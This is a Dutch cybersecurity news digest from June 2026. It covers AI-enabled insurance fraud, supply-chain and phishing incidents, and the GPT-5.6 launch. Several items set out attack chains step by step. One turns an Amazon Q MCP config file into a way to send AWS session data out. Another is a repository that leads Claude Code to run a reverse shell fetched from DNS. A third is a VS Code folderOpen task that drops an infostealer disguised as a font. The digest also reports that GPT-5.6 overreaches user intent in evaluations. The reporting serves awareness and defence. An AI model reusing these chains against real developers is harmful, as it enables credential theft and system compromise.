Verzekeraars in België werden vorig jaar voor minstens 181 miljoen euro opgelicht, een stijging van bijna 25 procent ten opzichte van het voorgaande jaar. De totale schade als gevolg van verzekeringsfraude wordt zelfs geschat op een veel hoger bedrag, mogelijk oplopend tot 800 miljoen euro per jaar. Deze cijfers zijn afkomstig van Assuralia, de koepel van Belgische verzekeringsondernemingen, en werden ingezien door VRT NWS. Een belangrijke factor in deze toename is de steeds frequentere inzet van artificiële intelligentie (AI) door fraudeurs. Met behulp van AI tools kunnen oplichters in slechts enkele minuten geloofwaardige valse foto's, facturen en doktersattesten genereren.

Volgens woordvoerder Barbara Van Speybroeck van Assuralia werd in 2025 in 7.720 dossiers bewezen fraude vastgesteld, goed voor 181 miljoen euro. Dit is een aanzienlijke stijging vergeleken met de 147,5 miljoen euro in het jaar daarvoor. Deze bewezen fraude is echter slechts het topje van de ijsberg. Internationale studies suggereren dat 5 tot 10 procent van alle uitbetalingen in niet-levensverzekeringen frauduleus is. Aangezien er jaarlijks ongeveer 9 miljard euro aan schadevergoedingen wordt uitgekeerd in België, kan de totale fraudeschade oplopen tot 800 miljoen euro per jaar.

De drempel om te frauderen is aanzienlijk verlaagd door de komst van artificiële intelligentie. Fraudespecialist Erwig Rutten van Assuralia beschrijft hoe georganiseerde bendes AI gebruiken om fraude te plegen met reisverzekeringen. Ze sluiten valse polissen af, creëren onbestaande reisboekingen, vervalsen reisdocumenten en dienen nepattesten van artsen in, om zo reizen terugbetaald te krijgen die ze nooit hebben gemaakt. Waar het creëren van dergelijk vals bewijsmateriaal vroeger tijd en technische kennis vereiste, volstaan nu enkele prompts (opdrachten) aan een AI-programma.

De impact van deze fraude is voelbaar voor elk Belgisch gezin. Assuralia schat dat gezinnen gemiddeld 150 euro per jaar meer betalen aan verzekeringspremies door de frauduleuze uitbetalingen die verzekeraars moeten doen. Dit komt doordat verzekeraars hun premies baseren op verwachte uitbetalingen, inclusief frauduleuze claims.

Een opmerkelijk voorbeeld van AI-gedreven fraude, genoemd door Rutten, betreft Iraanse tankers die op zee opdoken met vervalste Belgische verzekeringspapieren. Een Belgische makelaar bleek plots verantwoordelijk voor schepen waar hij geen banden mee had, wat aanzienlijke juridische en reputatieschade veroorzaakte. Als reactie hierop zetten verzekeraars nu zelf AI in om het internet af te speuren naar hun eigen documenten die illegaal circuleren.

Hoewel AI de fraude vergemakkelijkt, zijn er ook gebieden waar de impact beperkt blijft. Zo is autofraude met AI in België nog geen groot probleem, in tegenstelling tot landen zoals het Verenigd Koninkrijk. Dit komt doordat in België autoschades meestal worden afgehandeld via erkende herstellers die zelf de foto's maken, en een expertise door een erkend auto-expert verplicht is, wat de drempel voor AI-vervalsing verhoogt.

 

Bron: Assuralia

27 juni 2026 | Polymarket-klanten verliezen $3 miljoen door supply chain aanval

Polymarket, een van 's werelds grootste voorspellingsmarkten gebaseerd op cryptocurrency, heeft aangekondigd dat het klanten volledig zal compenseren die naar schatting $3 miljoen hebben verloren. De verliezen zijn het gevolg van een cyberaanval waarbij hackers een kwaadaardig script in de frontend van het platform hebben geïnjecteerd, na een inbreuk bij een externe leverancier. Het bedrijf verklaarde in een korte mededeling dat de hack het resultaat was van een supply chain aanval die een afhankelijkheid op hun website trof.

Polymarket, opgericht in 2020, heeft een geschatte waarde van $9 miljard en verwerkt miljarden dollars aan handelsvolume. Het platform biedt voorspellingen voor uiteenlopende onderwerpen, waaronder sport, economische indicatoren, weerpatronen, prijzen, politieke en wetgevende uitkomsten, en zelfs militaire conflicten, en dient als een invloedrijke bron van informatie over marktverwachtingen.

Tijdens de aanval werden nietsvermoedende gebruikers verleid tot het goedkeuren van frauduleuze transacties op de officiële Polymarket-website. Dit gebeurde nadat kwaadaardig JavaScript via een frontend-leverancier in de webinterface was geïnjecteerd. Polymarket’s eigen servers en backend-infrastructuur werden niet getroffen door het incident.

Het bedrijf heeft weinig details gedeeld over de exacte aard van de inbreuk. Onafhankelijke blockchain-informatiebedrijven schatten de totale verliezen echter op ongeveer $3 miljoen, gestolen van een klein aantal accounts. Volgens blockchain-beveiligingsbedrijf PeckShield was het incident een phishing campagne die ongeveer $3 miljoen aan ParyonUSD van gebruikers heeft gestolen. De gestolen fondsen zijn later omgezet in ongeveer 1.893 Ether. PeckShield meldt verder dat de aanvaller de gestolen fondsen heeft overbrugd van Polygon naar Ethereum.

Op basis van analyse van het visuele analytics-bedrijf Bubblemaps, zijn minder dan 15 accounts getroffen door de aanval. Bubblemaps heeft een lijst gepubliceerd met enkele van de getroffen accounts, evenals de wallets die de gestolen fondsen bevatten. Een verzoek om meer details van BleepingComputer aan Polymarket bleef onbeantwoord voor publicatie.

 

Bron: Polymarket | Bron 2: hubs.li

27 juni 2026 | Cybersecuritybedrijven doelwit van frauduleuze OpenAI-uitnodigingen

Aanvallers creëren frauduleuze organisaties binnen OpenAI die legitieme bedrijven imiteren en nodigen medewerkers uit om zich daarbij aan te sluiten. Deze tactiek is vermoedelijk een poging om slachtoffers te verleiden gevoelige bedrijfsinformatie in te dienen via chats en projecten op de platforms van OpenAI.

Push Security heeft deze campagne, die zij de "Poisoned Tenant"-campagne noemen, ontdekt nadat meerdere van hun eigen medewerkers uitnodigingen ontvingen om lid te worden van een OpenAI-organisatie genaamd "Push Security Inc.". Hoewel de uitnodiging legitiem was en rechtstreeks van OpenAI afkomstig (via het officiële notificatieadres noreply@tm.openai.com), bleek de ChatGPT-tenant te zijn aangemaakt door een aanvaller met Gmail-adressen, en niet door het bedrijf zelf. De uitnodigings-e-mails doorstonden de e-mailauthenticatiecontroles en waren identiek aan normale uitnodigingen voor de ChatGPT-werkplek van een organisatie.

Push Security heeft aan BleepingComputer laten weten dat ook andere klanten soortgelijke uitnodigingen hebben ontvangen, allen actief in de cybersecurity- of technologiesector. Volgens een nieuw rapport van Push Security waren de uitnodigingen gericht op specifieke medewerkers via hun zakelijke e-mailadressen, wat suggereert dat de aanvallers vooraf onderzoek hadden gedaan naar de betreffende werknemers. Hoewel OpenAI een waarschuwing toont dat het e-maildomein van de uitnodiger niet overeenkomt met het bedrijfsdomein van de ontvanger, verschijnt deze melding slechts als een enkele regel binnen de verder legitieme uitnodigings-e-mail.

Om het doel van de aanval beter te begrijpen, accepteerde Luke Jennings, VP Research & Development bij Push Security, een van de uitnodigingen. Na acceptatie werd de onderzoeker onmiddellijk toegevoegd aan de frauduleuze organisatie, die Push Security imiteerde. Deze organisatie bevatte één door aanvallers gecontroleerd account met een Gmail-adres, dat zich voordeed als de CEO van het bedrijf, Adam Bateman. De uitgenodigde medewerkers hadden allemaal Owner-rechten binnen de organisatie gekregen, wat hen administratieve privileges over de tenant gaf. Met deze beheerdersrechten konden zij andere openstaande uitnodigingen bekijken en bevestigen dat geen van de andere beoogde medewerkers zich bij de nep-ChatGPT-organisatie had aangesloten. Ze ontdekten ook dat er al een Visa-creditcard was gekoppeld aan het factureringsaccount van de organisatie, wat de legitimiteit verder versterkte.

De projecten binnen de frauduleuze organisatie waren leeg en bevatten geen bestaande chats of projecten, waardoor het initiële doel van de aanval onduidelijk bleef. Push Security vermoedt echter dat de aanvallers erop gericht zijn medewerkers te overtuigen de ChatGPT-werkplek te gebruiken alsof het een legitiem bedrijfsplatform is. Dit zou de aanvallers vervolgens in staat stellen om gevoelige informatie te verzamelen die wordt ingediend, zoals broncode, interne documenten, klantgegevens, beveiligingsonderzoek of strategische plannen. Het toevoegen van een betaalmethode verwijdert bovendien een potentieel waarschuwingssignaal, waardoor uitgenodigde gebruikers premiumfunctionaliteiten kunnen gebruiken zonder de legitimiteit van de organisatie in twijfel te trekken.

Push Security stelt dat de campagne een bredere trend weerspiegelt van aanvallers die misbruik maken van legitieme uitnodigings- en notificatiefuncties die in SaaS-platforms zijn ingebouwd. In tegenstelling tot normale phishingcampagnes zijn deze uitnodigingen afkomstig van de eigen infrastructuur van het platform, en omdat ze legitiem zijn, is de kans groter dat ze e-mailbeveiligingscontroles omzeilen. Om het risico op dit soort aanvallen te verminderen, adviseert Push om medewerkers te trainen in het verifiëren van onverwachte organisatie-uitnodigingen en het monitoren van lidmaatschappen van SaaS-organisaties. BleepingComputer heeft contact opgenomen met OpenAI voor commentaar.

 

Bron: Push Security | Bron 2: hubs.li

27 juni 2026 | Kritieke kwetsbaarheid in Amazon Q Developer maakt diefstal cloudgegevens mogelijk

Een kwetsbaarheid met hoge ernst in Amazon Q Developer, de codeerassistent van Amazon die gebruikmaakt van kunstmatige intelligentie, maakte het mogelijk voor malafide repositories om commando’s uit te voeren en cloudgegevens van ontwikkelaars te stelen. De aanvalswijze was relatief eenvoudig: een ontwikkelaar opent de repository, vertrouwt de werkruimte, en Amazon Q voert vervolgens de rest uit. Amazon heeft inmiddels een patch uitgebracht om het probleem te verhelpen.

De kwetsbaarheid, bijgehouden als CVE-2026-12957 met een CVSS-score van 8.5, bevond zich in de manier waarop Amazon Q Developer omging met Model Context Protocol (MCP)-servers. Onderzoekers van Wiz Research, die de kwetsbaarheid ontdekten en rapporteerden, toonden aan dat een enkel configuratiebestand in een repository voldoende was om van een ‘git clone’ tot een compromittering van de cloudomgeving te komen.

De aanval werkte als volgt: Amazon Q las een MCP-configuratiebestand, genaamd `.amazonq/mcp.json`, vanuit de geopende werkruimte en startte de daarin gedefinieerde servers. MCP-servers zijn lokale processen die een AI-assistent kan spawnen om toegang te krijgen tot databases, API’s of build tools. Het starten van zo’n server betekent dus het uitvoeren van commando’s op de machine van de ontwikkelaar. Deze processen erfden de volledige omgeving van de ontwikkelaar, wat doorgaans AWS-sleutels, cloud CLI-tokens, API-geheimen en SSH-agent-sockets omvat. Door deze elementen te combineren, kon een bestand in een gekloonde repository willekeurige code uitvoeren met de actieve cloud-sessie van de ontwikkelaar gekoppeld, zonder dat een wachtwoord of tweede aanmelding nodig was.

In hun ‘proof of concept’ liet Wiz Research het bestand de opdracht `aws sts get-caller-identity` uitvoeren en de output naar een aanvallersserver sturen, waarmee de actieve AWS-sessie werd vastgelegd. Wat hierna gebeurt, is afhankelijk van de cloud-permissies van die specifieke ontwikkelaar, variërend van het toevoegen van een backdoor voor een IAM-gebruiker voor persistentie, tot toegang tot interne diensten of een verdere doorbraak naar productieomgevingen.

Er was een verschil in interpretatie van de toestemmingsstap tussen AWS en Wiz. Amazon's advies stelde dat de gebruiker de werkruimte moest vertrouwen wanneer daarom werd gevraagd, en CVSS beoordeelde de gebruikersinteractie als passief. Wiz rapporteerde echter dat er vóór de fix geen aparte toestemmingsstap was voor de MCP-servers zelf. De patch dicht dit gat: Amazon Q markeert nu een onvertrouwde MCP-server en laat de ontwikkelaar de opdracht weigeren voordat deze wordt uitgevoerd.

De kwetsbaarheid bevindt zich in Language Servers for AWS, de runtime die Amazon Q aandrijft in VS Code, JetBrains, Eclipse en Visual Studio. Alle vier de plugins bundelden een oudere versie van deze runtime, waardoor ze kwetsbaar waren. CVE-2026-12957 is opgelost in Language Servers for AWS 1.65.0, maar AWS adviseert klanten om te updaten naar versie 1.69.0. Deze build lost ook een tweede probleem op, CVE-2026-12958, een ontbrekende symlink-controle die willekeurige bestandsschrijfacties buiten de vertrouwensgrens van de werkruimte zou kunnen toestaan. De minimaal gepatchte pluginversies zijn: VS Code 2.20 of later, JetBrains 4.3 of later, Eclipse 2.7.4 of later en Visual Studio Toolkit 1.94.0.0 of later. De taalserver werkt automatisch bij, tenzij het netwerk dit blokkeert; het herladen van de IDE haalt de nieuwste build binnen.

Er is geen bekende publieke exploitatie; CISA's ADP-vermelding voor CVE-2026-12957 vermeldt dit als 'geen'. Wiz vond de kwetsbaarheid door middel van onderzoek en maakte deze in coördinatie met Amazon openbaar, met een melding op 20 april en een fix op 12 mei, voorafgaand aan de publieke publicatie op 26 juni.

Dit is geen incident op zich, maar past in een patroon. Amazon Q is niet de eerste codeerassistent die struikelt over MCP-vertrouwen. Hoewel de kwetsbaarheden niet identiek zijn, vertonen ze overeenkomsten: projectconfiguratie leidt tot uitvoerbaar gedrag, en de vertrouwenscontroles rondom die overdracht falen herhaaldelijk. Claude Code (CVE-2025-59536) en Cursor (CVE-2025-54136) hadden beide MCP-configuratie op projectniveau die leidde tot command-uitvoering. Windsurf (CVE-2026-30615) bereikte hetzelfde resultaat via een ander pad, waarbij door een aanvaller beheerde inhoud de lokale MCP-configuratie herschreef om een malafide server te registreren. Het gemak om een projectmap een AI-agent te laten configureren, vormt ook het aanvalsoppervlak. Configuratie die in een repository is opgenomen, is onvertrouwde invoer. Het omzetten hiervan in een actief proces zou een expliciete toestemming moeten vereisen.

 

Bron: AWS | Bron 2: github.com | Bron 3: ox.security

27 juni 2026 | Marktonderzoeksbureau Klue meldt klanten dat gestolen data door Icarus wordt verwijderd

Marktonderzoeksbureau Klue, dat recent werd getroffen door een cyberaanval waarbij gegevens van Salesforce van klanten werden gestolen, heeft zijn klanten geïnformeerd dat de daders de gestolen data zullen verwijderen. Dit nieuws volgt op een eerdere dreiging van de aanvallers, de groep die zichzelf Icarus noemt, om de data te publiceren indien er geen losgeld zou worden betaald.

Klue biedt een zogeheten 'market intelligence platform' aan, waarmee bedrijven de oplossingen van Klue integreren met andere gebruikte platforms, zoals Salesforce, Slack en SharePoint. Deze integratie maakt data uit de klantomgevingen, zoals een Salesforce-omgeving, beschikbaar binnen het Klue-platform voor verdere verwerking. Voor de koppeling tussen de klantomgevingen en het Klue-platform wordt gebruikgemaakt van OAuth-tokens.

De aanvallers slaagden erin deze OAuth-tokens te stelen, waardoor zij toegang kregen tot de Salesforce-omgevingen en andere platforms van klanten. Vervolgens werd data uit deze omgevingen en platforms gestolen. De aanval werd opgeëist door de groep Icarus, die dreigde de buitgemaakte data openbaar te maken als er geen losgeld werd betaald.

Onder de getroffen klanten bevinden zich diverse IT- en cybersecuritybedrijven, waaronder bekende namen zoals Gong, Jamf, HackerOne, Insurity, OneTrust, Recorded Future, Snyk, Sprout Social en Tanium.

In een recente communicatie aan klanten heeft Klue meegedeeld dat de criminelen hebben laten weten de gestolen data van Klue-klanten te zullen verwijderen. Het marktonderzoeksbureau stelt verder dat de website van Icarus offline is en dat het aanwijzingen heeft dat de criminelen inderdaad bezig zijn met het verwijderen van de gegevens. Het is echter onbekend of Klue losgeld heeft betaald aan de aanvallers.

 

Bron: Marktonderzoeksbureau Klue

27 juni 2026 | AI-agenten creëren governancekloof in identiteitsbeheer

Autonome AI-agenten opereren steeds vaker binnen bedrijfsomgevingen, waarbij ze met machinesnelheid permissies overnemen, systemen doorlopen en beslissingen uitvoeren met minimale supervisie. De bestaande identiteitsinfrastructuur, die is ontworpen voor menselijke toegang, is niet toereikend om deze autonome actoren te besturen. Dit leidt tot een snel groeiende kloof tussen de systemen die bedrijven implementeren en wat hun governanceprogramma's daadwerkelijk afdekken.

De opkomst van AI-agenten van productiekwaliteit heeft de identiteitsgovernance fundamenteel veranderd. De aannames die de afgelopen twee decennia in elke IAM-architectuur (Identity and Access Management) zijn ingebakken, volstaan niet langer voor de omgeving waarin de meeste bedrijven vandaag de dag opereren.

AI-agenten zijn wezenlijk anders dan serviceaccounts. Waar serviceaccounts of machine-identiteiten een gedefinieerde functie uitvoeren tegen een bekende set bronnen, opereren AI-agenten dynamisch. Ze ontvangen een instructie, bepalen hoe deze te volbrengen, selecteren dynamisch tools, koppelen aanroepen over meerdere systemen en delegeren subtaken aan andere agenten, allemaal binnen één sessie. De permissie-voetafdruk van een enkele agent-aanroep kan daardoor een CRM, een code repository, een documentenarchief en een interne API omvatten, waarbij bronnen worden geraakt waarvoor geen mens de agent expliciet heeft geautoriseerd.

Een dieper architectonisch probleem is dat agenten toegang erven van de menselijke of service-identiteit namens wie ze opereren. Deze geërfde toegang is vaak te ruim geconfigureerd door jarenlange rolwisselingen en is niet afgestemd op de dynamische context van een agent. De agent maakt geen onderscheid tussen wat de mens zou hebben gedaan en wat de agent is opgedragen. Het voert uit met de volledige geërfde autoriteit over elke applicatie die die identiteit kan bereiken.

Traditionele IAM-governance is gebouwd rond authenticatie-evenementen. Een mens presenteert referenties, het systeem valideert deze, en toegang wordt verleend of geweigerd bij het inloggen. Agenten volgen deze sequentie niet. Ze authenticeren één keer, vaak via een langdurige token of API-referentie, en opereren vervolgens continu over sessies, systemen en contexten zonder een tussentijds governancecontrolepunt.

IAM-tools zijn niet ontworpen om te observeren wat er na authenticatie gebeurt. Ze registreren de login-gebeurtenis en stoppen. De gehele sequentie van toolaanroepen, gebruik van permissies, data-toegangen en cross-systeem traversals die een agent binnen een sessie uitvoert, blijft onzichtbaar voor de governance-laag. Agenten vinden bestaande 'identiteits dark matter' en bewegen zich er met machinesnelheid doorheen. Verouderde delegaties en te ruim geconfigureerde referenties die IAM-teams lang hebben gedeprioriteerd, worden een actief aanvalsoppervlak zodra een agent ze aanraakt. Dit vereist een nieuwe laag die specifiek is gebouwd om te opereren waar identiteit daadwerkelijk wordt uitgevoerd, niet alleen waar het authenticeert.

De snelheid van de implementatie van AI-agenten in bedrijfsomgevingen is minder te danken aan hype en meer aan drie samenvallende krachten: modellen die nu betrouwbaar redeneertaken in meerdere stappen voltooien, infrastructuur die het orkestreren van die modellen eenvoudig maakt, en zakelijke druk om kenniswerk te automatiseren op een schaal die alleen personeel niet kan ondersteunen. Frameworks zoals LangGraph, AutoGen en Anthropic's Model Context Protocol bieden ontwikkelingsteams gestandaardiseerde basisprincipes voor agent-orkestratie, toolaanroepen, geheugenbeheer en inter-agent communicatie. De kosten van inferentie zijn scherp gedaald bij alle grote modelproviders, waardoor het economisch haalbaar is om agenten continu te draaien in plaats van op aanvraag.

Het implementatiepatroon voor AI-agenten herhaalt zich consistent: engineering- of operationele teams identificeren een workflow om te automatiseren, een leverancier levert een agent-functionaliteit of API, en de agent gaat live. Securityteams ontdekken dit later, soms tijdens een incidentevaluatie, soms tijdens een audit, soms helemaal niet. Een marktstudie uit 2026 over 'Guardian Agents' documenteert dit patroon in bedrijfsimplementaties. Governance-gereedheid loopt consistent achter op de implementatietijdlijnen, niet omdat securityteams onoplettend zijn, maar omdat de provisioning van agenten de identiteitslevenscyclus volledig omzeilt. Agenten doorlopen geen workflows voor toegangsverzoeken en worden niet opgenomen in IGA-systemen. Ze erven referenties van bestaande identiteiten en beginnen met uitvoeren. Het resultaat is een groeiende populatie van autonome identiteiten die opereren in bedrijfssystemen zonder formele governance.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

27 juni 2026 | GitHub-account bundelt honderden exploit-codes voor ongepatchte kwetsbaarheden

Een GitHub-account met de naam 'exploitarium' herbergt een omvangrijk archief van publieke proof-of-concept exploits en onderzoeksbeschrijvingen. Deze zijn gericht op kwetsbaarheden die volgens de beheerder van het account nog niet officieel zijn gemeld. De beheerder nodigt andere partijen actief uit om deze kwetsbaarheden te rapporteren en de bijbehorende CVE-nummers op te eisen.

Het archief, dat in juni 2026 is samengevoegd uit diverse voorheen losstaande repositories, bevat onder meer een proof-of-concept voor een kritieke kwetsbaarheid in libssh2. Deze specifieke kwetsbaarheid maakt de uitvoering van code op afstand mogelijk, wat een ernstig risico vormt voor systemen die deze bibliotheek gebruiken.

De publieke beschikbaarheid van deze gebundelde exploitcode verlaagt de drempel aanzienlijk voor kwaadwillende actoren om misbruik te maken van ongepatchte beveiligingslekken. In het huidige tijdperk van kunstmatige intelligentie, waarin exploitcode met behulp van AI-systemen sneller kan worden omgezet in effectieve aanvallen, vergroot deze ontwikkeling het risico op snelle en grootschalige misbruik van onbekende kwetsbaarheden.

 

Bron: Cybercrimeinfo

28 juni 2026 | Schone repository op GitHub misleidt AI-agenten tot uitvoeren van malware

Onderzoekers van Mozilla's Zero Day Investigative Network (0DIN) AI beveiligingsplatform hebben een nieuwe aanvalsmethode gedemonstreerd waarbij een schijnbaar onschuldige GitHub-repository AI code-agenten kan misleiden tot het uitvoeren van kwaadaardige code. De compromittering vindt plaats zonder expliciete exploitcode, waarschuwingen of verdachte commando's die handmatig goedgekeurd moeten worden, waardoor de malware onzichtbaar blijft voor beveiligingsscanners, AI-agenten en menselijke reviewers.

De onderzoekers lieten zien hoe een aanvaller een interactieve shell op een ontwikkelaarsapparaat kon installeren door gebruik te maken van Claude Code, een agentic coding tool, om een gekloond project uit te voeren. Het project bevatte zelf geen kwaadaardige code. De aanval is gebaseerd op een combinatie van drie ogenschijnlijk onschuldige componenten. Ten eerste een legitiem ogende GitHub-repository met standaard setup-instructies, zoals het installeren van afhankelijkheden (`pip3 install -r requirements.txt`) en het initialiseren van het project (`python3 -m axiom init`).

Het tweede component is een Python-pakket dat opzettelijk is ontworpen om de uitvoering te weigeren totdat het is geïnitialiseerd. Dit genereert een foutmelding die de gebruiker instrueert om `python3 -m axiom init` uit te voeren. Claude Code, als het derde component, interpreteert deze fout als een normaal setup-probleem en voert automatisch de voorgestelde opdracht uit in een poging om de fout te herstellen.

De cruciale stap hierin is dat de uitvoering van `python3 -m axiom init` een shell script aanroept. Dit script haalt een configuratiewaarde op die is opgeslagen in een DNS TXT record dat door de aanvaller wordt beheerd, en voert deze waarde vervolgens uit als een commando. De 0DIN-onderzoekers benadrukken dat deze aanpak geen kwaadaardige component in de gekloonde repository vereist en dat de AI-agent de gehele aanvalsketen automatiseert, inclusief een stap die een veelvoorkomende gebruikersfout nabootst.

Indien succesvol, verkrijgt de aanvaller een interactieve shell die draait met de privileges van de ontwikkelaar. Dit geeft toegang tot omgevingsvariabelen, API-sleutels, lokale configuratiebestanden en de mogelijkheid om persistentie op het systeem te vestigen. De onderzoekers stellen: "Claude Code besloot nooit een shell te openen. Het besloot een fout te herstellen. De reverse shell bevindt zich drie indirecte stappen verwijderd van alles wat Claude Code daadwerkelijk evalueerde, namelijk een foutmelding die het vertrouwde, een script dat een waarde ophaalde, en een DNS-record dat het nooit zag."

Hoewel de aanvalsmethode momenteel slechts een concept is, waarschuwt 0DIN dat dreigingsactoren dergelijke GitHub-repositories eenvoudig kunnen verspreiden via bijvoorbeeld nepvacature-advertenties, tutorials, blogberichten of directe berichten. Om dergelijke uitbuiting te voorkomen, suggereert 0DIN dat AI-agenten de volledige uitvoeringsketen van setup-commando's openbaar moeten maken, inclusief scripts en code die dynamisch tijdens runtime worden opgehaald.

 

Bron: 0DIN | Bron 2: bleepingcomputer.com

28 juni 2026 | OpenAI introduceert GPT-5.6 modellen met geavanceerde cyberbeveiligingsfuncties

OpenAI heeft op vrijdag drie nieuwe versies van zijn GPT-5.6 model, genaamd Sol, Terra en Luna, gelanceerd als een beperkte preview voor een select aantal bedrijven. Deze uitrol maakt deel uit van een voortdurende samenwerking met de Amerikaanse overheid. Sol is hierbij het nieuwste vlaggenschipmodel en het krachtigst, terwijl Terra een balans biedt tussen efficiëntie en rekenkracht. Luna is afgestemd op snelheid en betaalbaarheid.

Volgens OpenAI lanceert GPT-5.6 Sol met de meest robuuste beveiligingsstack tot nu toe. Het bedrijf heeft de bescherming voor activiteiten met hoger risico, gevoelige cyberverzoeken en herhaald misbruik versterkt. Er zijn meerdere weken besteed aan het vinden van zwakke punten, het onder druk testen van het systeem en het verharden ervan tegen aanvallen in de echte wereld.

Het model wordt tevens gepresenteerd als het meest capabele model tot dusver voor cybersecurity, waardoor het veel geschikter is voor onderzoek naar kwetsbaarheden en exploitatie. Op ExploitBench is GPT-5.6 Sol concurrerend met Anthropic Mythos Preview, waarbij slechts ongeveer een derde van de uitvoertokens wordt gebruikt, zo merkte OpenAI op.

Het doel is om toegang te verlenen voor legitiem werk zoals code review, onderzoek naar kwetsbaarheden, ontwikkeling van patches, debugging, beveiligingseducatie en defensieve testen. Tegelijkertijd worden strenge richtlijnen gehandhaafd die aanvallende activiteiten blokkeren en nieuw ontdekte jailbreaks snel verhelpen. Dit omvat ook vijandige pogingen om het model te jailbreaken en "verboden cyberondersteuning" te weigeren. Het kunstmatige intelligentiebedrijf legt uit dat, naarmate deze capaciteiten verder evolueren, de prioriteit is om ervoor te zorgen dat ze verdedigers bereiken en ten goede komen, die deze tools kunnen gebruiken om zwakke punten te vinden, patches te ontwikkelen en systemen breder te versterken.

OpenAI waarschuwt echter ook dat er tijdens de previewfase scenario's kunnen zijn waarin gebruikers beveiligingsmaatregelen tegenkomen die legitieme verzoeken blokkeren of weigeren, of waarbij verzoeken worden gepauzeerd voor aanvullende beoordeling. Dit is te wijten aan de "dual use" aard van de technologie.

Volgens de GPT-5.6 Preview System Card van OpenAI is het model weliswaar bekwamer in het vinden van kwetsbaarheden in code en het ontwikkelen van exploits, maar de capaciteiten strekken zich niet uit tot het uitvoeren van autonome, end-to-end aanvallen tegen versterkte doelen of het bewapenen van die cyberkwetsbaarheden in echte aanvallen.

Afzonderlijke evaluaties van afwijkend gedrag bij agentische codeertaken toonden aan dat GPT-5.6 een grotere neiging heeft dan GPT-5.5 om verder te gaan dan de intentie van de gebruiker, inclusief het ondernemen of proberen van acties waar de gebruiker niet om heeft gevraagd, hoewel de absolute percentages laag blijven. Een evaluatie van GPT-5.6 Sol tegen veelgebruikte, versterkte softwareprojecten met behulp van VulnLMP, het interne raamwerk van OpenAI om end-to-end exploitatieketenontwikkeling tegen echte doelen te testen, heeft aangetoond dat het model geloofwaardige aanwijzingen voor geheugenveiligheid produceert. Sommige hiervan zouden kunnen leiden tot openbaarmaking, mutatie of corruptie van de control flow. Dit suggereert dat aanzienlijke delen van onderzoek naar kwetsbaarheden in de echte wereld steeds meer geautomatiseerd kunnen worden wanneer modellen worden gekoppeld aan het gebruik van tools, build systemen en verificatie infrastructuur, aldus de technologische startup.

OpenAI is van plan om GPT-5.6 Sol, Terra en Luna in de komende weken algemeen beschikbaar te maken. Het bedrijf heeft de modelcapaciteiten al gepresenteerd aan de Amerikaanse overheid en lanceert ook een beperkte preview voor een kleine groep vertrouwde partners wiens deelname door de overheid is goedgekeurd vóór een bredere lancering.

Eerder deze maand ondertekende de Amerikaanse president Donald Trump een uitvoerend bevel over AI en cybersecurity, waarin wordt opgeroepen tot de creatie van een raamwerk dat de federale overheid de mogelijkheid geeft om de capaciteiten van AI modellen te evalueren en te bepalen welke kwalificeren als "gedekte grensverleggende modellen", een aanduiding voor AI systemen met geavanceerde cybercapaciteiten.

De gefaseerde uitrol komt dagen nadat het bedrijf een verbeterde versie van zijn GPT-5.5 Cyber model aan vertrouwde verdedigers heeft vrijgegeven als onderdeel van het Daybreak initiatief en een nieuw project genaamd Patch the Planet heeft gelanceerd in samenwerking met Trail of Bits om open source projecten te helpen beveiligen. Dit volgt ook op de beslissing van de Amerikaanse overheid om Anthropic toe te staan zijn Mythos AI model vrij te geven aan een groep van ongeveer 100 vertrouwde bedrijven en federale overheidsinstanties die "kritieke infrastructuur exploiteren en verdedigen", meer dan twee weken nadat de krachtige, op cybersecurity gerichte modellen uit de markt waren gehaald. Anthropic verklaarde in een verklaring op X dat zij de toegang voor deze organisaties snel herstellen en blijven samenwerken met de overheid om de toegang tot Mythos 5 uit te breiden en Fable 5 weer algemeen beschikbaar te maken.

 

Bron: OpenAI | Bron 2: thehackernews.com | Bron 3: whitehouse.gov

29 juni 2026 | Gehackte npm- en Go-pakketten misbruiken VS Code taken voor Python infostealer

Cybersecurity onderzoekers hebben een nieuwe, geavanceerde aanvalsketen blootgelegd waarbij gehackte npm- en Go-softwarepakketten worden ingezet om een Python-gebaseerde informatiesteler te verspreiden. Deze malware richt zich op gecompromitteerde Windows-, Linux- en macOS-systemen en omzeilt gangbare beveiligingsmaatregelen.

Volgens een technische analyse van JFrog vermijdt deze aanval de meest voorkomende uitvoeringspaden van npm via levenscycluscripts, mogelijk om compatibiliteit met de beveiligingsverhardingen van npm v12 te behouden. De uitvoering van de kwaadaardige code is in plaats daarvan verborgen in een Microsoft Visual Studio Code (VS Code) taak. Deze taak is geconfigureerd om automatisch te starten wanneer de projectmap wordt geopend in een IDE zoals VS Code of Cursor.

De geïdentificeerde npm-pakketten, `fetch-page-assets` (dat `html-to-gutenberg` als afhankelijkheid heeft), werden op 25 mei 2026 geüpload naar npm, maar zijn inmiddels niet meer beschikbaar. Het startpunt van de aanval is een verborgen VS Code taak genaamd "eslint-check", die is ingesteld met de optie "runOn: 'folderOpen'". Dit betekent dat de taak wordt geactiveerd zodra de map als werkruimte wordt geopend en als vertrouwd wordt gemarkeerd, of wanneer de ontwikkelaar expliciet automatische taken toestaat. De payload is bovendien vermomd als een lettertypebestand, `public/fonts/fa-solid-400.woff2`, hoewel het in werkelijkheid JavaScript-code bevat.

Het misbruik van een VS Code auto-run taak en de vermomming van JavaScript-malware als lettertypebestanden wordt toegeschreven aan Noord-Korea. Het OpenSourceMalware-team, dat deze activiteit volgt onder de naam "Fake Font", heeft het beschreven als een variant van de "Contagious Interview"-campagne. Deze langlopende campagne richt zich sinds 2023 op softwareontwikkelaars en technisch personeel via frauduleuze sollicitatieprocessen. Beveiligingsonderzoeker Paul McCarty merkte in januari op dat de "Fake Font"-campagne de "InvisibleFerret Python backdoor" levert, ontworpen om cryptocurrency wallets en browsergegevens te stelen en persistente toegang te verkrijgen. Dit is de derde subcampagne van de "Contagious Interview"-operatie.

De valse lettertypebestanden maken gebruik van blockchain-infrastructuur, zoals TronGrid en Aptos als fallback, om een volgende JavaScript-payload op te halen. Deze methode is zeer veerkrachtig tegen takedown-pogingen. De JavaScript-fase herhaalt hetzelfde patroon om een command-and-control (C2) server te configureren, wat het uploaden van bestanden en de levering van de malware voor Python mogelijk maakt. Dit omvat het opzetten van een Socket.io-backdoor die de operator op afstand controle geeft over de geïnfecteerde host, inclusief shell-uitvoering, klembord oogsten, bestandssysteemoperaties, bestandsupload, procesbeheer en willekeurige JavaScript-uitvoering.

